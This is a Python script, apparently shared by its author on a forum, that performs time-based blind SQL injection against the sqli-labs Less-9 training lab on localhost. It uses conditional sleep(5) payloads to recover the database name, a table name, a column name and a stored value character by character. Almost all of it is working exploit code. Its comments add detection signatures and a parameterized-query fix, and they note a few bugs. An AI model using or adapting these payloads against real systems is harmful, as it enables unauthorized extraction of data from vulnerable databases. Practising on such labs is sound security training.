import requests
import time
# Time-based blind SQL injection walkthrough against the sqli-labs Less-9
# training target on localhost (the URL below). The script never reads the
# HTTP response body; every decision is made purely from how long the
# server takes to answer. A probe is "true" when the injected
# `sleep(5)` fires and the round trip takes >= 4 s.
#
# Five phases, each reusing the same two module-level variables:
#   payload1 -> "is the length of X equal to N?"   (linear scan, N = 1, 2, ...)
#   payload2 -> "is character N of X equal to C?"  (scan over `dic` per position)
# Phases: database name -> first table name -> a column name -> one row value.
#
# Defender notes (grounded in the request strings below):
#   * Every request carries `sleep(`, `if(`, `--+` and (from the second
#     phase on) `information_schema` in the query string, and the scan sends
#     up to ~60 requests per recovered character -- an easy WAF/log signature.
#   * The root cause on the server side is string-concatenated SQL; bound
#     parameters remove the whole class of issue.
#   * Any network stall >= 4 s is indistinguishable from a true answer, so a
#     slow link produces wrong characters.
# Character set tried for each position. NOTE: the inner loops run while
# q <= len(dic)-1, so index q-1 never reaches the last entry ('0'); a
# position whose true character is '0' is silently skipped (nothing appended).
dic="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-=_+1234567890"
# Local lab instance only.
url="http://127.0.0.1/sqli-labs-master/Less-9/"
# Query-string prefix: the `'` closes the string literal the lab wraps `id` in.
close="?id=1'"
database=""
length=1
# %s -> candidate length; `--+` comments out the remainder of the server query.
payload1="and if(length(database())=%s,sleep(5),null)--+"
# %s, %s -> 1-based character position, candidate character.
payload2='and if(substr(database() ,%s,1)="%s",sleep(5),null)--+'
print("开始爆破数据库长度")
# Phase 1: database-name length. `length>0` is always true here, so the loop
# has no upper bound -- it only exits via `break` on the first slow response.
while length>0:
    print("正在尝试%d位"%length)
    payload=payload1%(str(length))
    start=time.time()
    # Response object is assigned but never inspected; only elapsed time matters.
    a=requests.request('get',url+close+payload)
    finish=time.time()
    long=finish-start
    # 4 s threshold leaves 1 s slack below the injected sleep(5).
    if long>=4:
        break
    length=length+1
print("成功:数据库长度为%d"%length)
print("开始爆破数据库名")
i=1
# Phase 2: one character per position, first matching `dic` entry wins.
while i<=length:
    q=1
    print("正在尝试%d位"%i,end=" ")
    while q<=(len(dic)-1):
        payload=payload2%(i,dic[q-1])
        start=time.time()
        a=requests.request('get',url+close+payload)
        finish=time.time()
        long=finish-start
        if long>=4:
            database=database+dic[q-1]
            print("成功:结果为%s"%dic[q-1])
            break
        q=q+1
    i=i+1
print("数据库爆破完成,名为:%s"%database)
print("开始爆破表长度")
table_name=""
length=1
# Phase 3/4 templates: first table (`limit 0,1`) of the schema found above.
# Note the missing space before `limit` -- MySQL tolerates `"..."limit`.
payload1='and if(length((select table_name from information_schema.tables where table_schema="%s"limit 0,1))=%s,sleep(5),null)--+'
payload2='and if(substr((select table_name from information_schema.tables where table_schema="%s"limit 0,1),%s,1)="%s",sleep(5),null)--+'
# Phase 3: table-name length (same unbounded scan as phase 1).
while length>0:
    print("正在尝试%d位"%length)
    payload=payload1%(database,length)
    start=time.time()
    a=requests.request('get',url+close+payload)
    finish=time.time()
    long=finish-start
    if long>=4:
        break
    length=length+1
print("成功:表长度为%d"%length)
print("开始爆破表名")
i=1
# Phase 4: table name, character by character.
while i<=length:
    q=1
    print("正在尝试%d位"%i,end=" ")
    # `len(str(dic))` is the same bound as `len(dic)` in the other phases.
    while q<=(len(str(dic))-1):
        payload=payload2%(database,i,dic[q-1])
        start=time.time()
        a=requests.request('get',url+close+payload)
        finish=time.time()
        long=finish-start
        if long>=4:
            table_name=table_name+dic[q-1]
            print("成功:结果为%s"%dic[q-1])
            break
        q=q+1
    i=i+1
print("表名爆破完成,结果为:%s"%table_name)
print("开始爆破字段名长度")
length=1
# Phase 5/6 templates: `limit 1,1` selects the SECOND column of the table
# (unlike the `limit 0,1` used for the table name above).
payload1='and if(length((select column_name from information_schema.columns where table_name="%s"limit 1,1))=%s,sleep(5),null)--+'
payload2='and if(substr((select column_name from information_schema.columns where table_name="%s"limit 1,1),%s,1)="%s",sleep(5),null)--+'
# Phase 5: column-name length.
while length>0:
    print("正在尝试%d位"%length)
    payload=payload1%(table_name,length)
    start=time.time()
    a=requests.request('get',url+close+payload)
    finish=time.time()
    long=finish-start
    if long>=4:
        break
    length=length+1
print("成功:字段名长度为%d"%length)
print("开始爆破字段名")
i=1
column_name=""
# Phase 6: column name, character by character.
while i<=length:
    q=1
    print("正在尝试第%d位"%i,end=" ")
    while q<=(len(dic)-1):
        payload=payload2%(table_name,i,dic[q-1])
        start=time.time()
        a=requests.request('get',url+close+payload)
        finish=time.time()
        long=finish-start
        if long>=4:
            column_name=column_name+dic[q-1]
            print("成功:结果为%s"%dic[q-1])
            break
        q=q+1
    i=i+1
print("字段名爆破完成,结果为:%s"%column_name)
print("开始爆破数据长度")
length=1
# Phase 7/8 templates: the table name is hard-coded as `emails` here rather
# than taken from `table_name`; only the column name is substituted.
payload1='and if(length((select %s from emails limit 0,1))=%s,sleep(5),null)--+'
payload2='and if(substr((select %s from emails limit 0,1),%s,1)="%s",sleep(5),null)--+'
# Phase 7: length of the first row's value in that column.
while length>0:
    print("正在尝试%d位"%length)
    payload=payload1%(column_name,length)
    start=time.time()
    a=requests.request('get',url+close+payload)
    finish=time.time()
    long=finish-start
    if long>=4:
        break
    length=length+1
print("成功:数据长度为%d"%length)
print("开始爆破数据")
i=1
data=""
# Phase 8: the value itself, character by character.
while i<=length:
    q=1
    print("正在尝试%d位"%i,end=" ")
    while q<=(len(dic)-1):
        payload=payload2%(column_name,i,dic[q-1])
        start=time.time()
        a=requests.request('get',url+close+payload)
        finish=time.time()
        long=finish-start
        if long>=4:
            data=data+dic[q-1]
            print("成功:结果为%s"%dic[q-1])
            break
        q=q+1
    i=i+1
print("数据爆破完成,结果为%s"%data)
贴一篇自己写的时间盲注脚本